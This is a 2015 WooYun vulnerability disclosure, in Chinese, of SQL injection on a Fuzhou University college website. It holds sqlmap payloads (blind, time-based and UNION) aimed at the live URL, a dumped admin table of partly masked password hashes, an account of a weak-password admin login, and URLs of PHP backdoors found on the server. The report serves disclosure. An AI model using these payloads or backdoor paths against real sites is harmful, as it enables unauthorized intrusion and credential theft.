漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0137933
漏洞标题:福州大学某站sql注入
相关厂商:福州大学
漏洞作者: 路人甲
提交时间:2015-09-01 12:54
修复时间:2015-09-06 12:56
公开时间:2015-09-06 12:56
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:12
漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-09-01: 细节已通知厂商并且等待厂商处理中
2015-09-06: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
小菜鸟只会挖挖学校。。
详细说明:
http://jxxy.fzu.edu.cn/index.php/Index/view/id/4417.html
福州大学机械工程及其自动化学院。
我的专业。。。
随手一个单引号 http://jxxy.fzu.edu.cn/index.php/Index/view/id/4417'.html
没有出现找不到网页,貌似有问题,扔进sqlmap瞧瞧
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://jxxy.fzu.edu.cn:80/index.php/Index/view/id/4417 AND 7297=729
7.html
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: http://jxxy.fzu.edu.cn:80/index.php/Index/view/id/4417 AND (SELECT
* FROM (SELECT(SLEEP(5)))ERMW).html
Type: UNION query
Title: Generic UNION query (NULL) - 22 columns
Payload: http://jxxy.fzu.edu.cn:80/index.php/Index/view/id/-6357 UNION ALL S
ELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL
,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716b6b7171,0x674f4d4c4141774f736a,0x7178
7a7871)-- .html
---
[10:08:15] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0.12
找到管理员账号密码
Database: preem
Table: pe_user
[8 entries]
+---------+--------------------------+
| account | password |
+---------+--------------------------+
| a--in | a0b1d4b26858--c74401f867 |
| jx--b | e10adc3949ba--abbe56e057 |
| ya--zx | e10adc3949ba--abbe56e057 |
| l-j | 70ef6a7faa26--f9a26e28bf |
| x-z | 1c5d1cbee42f--5136ed4274 |
| x-h | 21276dcdd137--a0b62b5fbe |
| x-h | fc4de2db48f6--c41fc19cd5 |
| che--ie | 1fc052562aa5--e8a2467438 |
+---------+--------------------------+
密码加密方式不是md5
找到后台地址试弱口令
http://jxxy.fzu.edu.cn/index.php/Public/logout
万幸,进来了。
找上传点
不能直接上传php文件,倒是发现了几个后门,后门上传时间是2013年
地址
http://jxxy.fzu.edu.cn//preem/Uploads/111.php
http://jxxy.fzu.edu.cn//preem/Uploads/4e59df9775452.php
漏洞证明:
121
修复方案:
121
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2015-09-06 12:56
厂商回复:
漏洞Rank:4 (WooYun评价)
最新状态:
暂无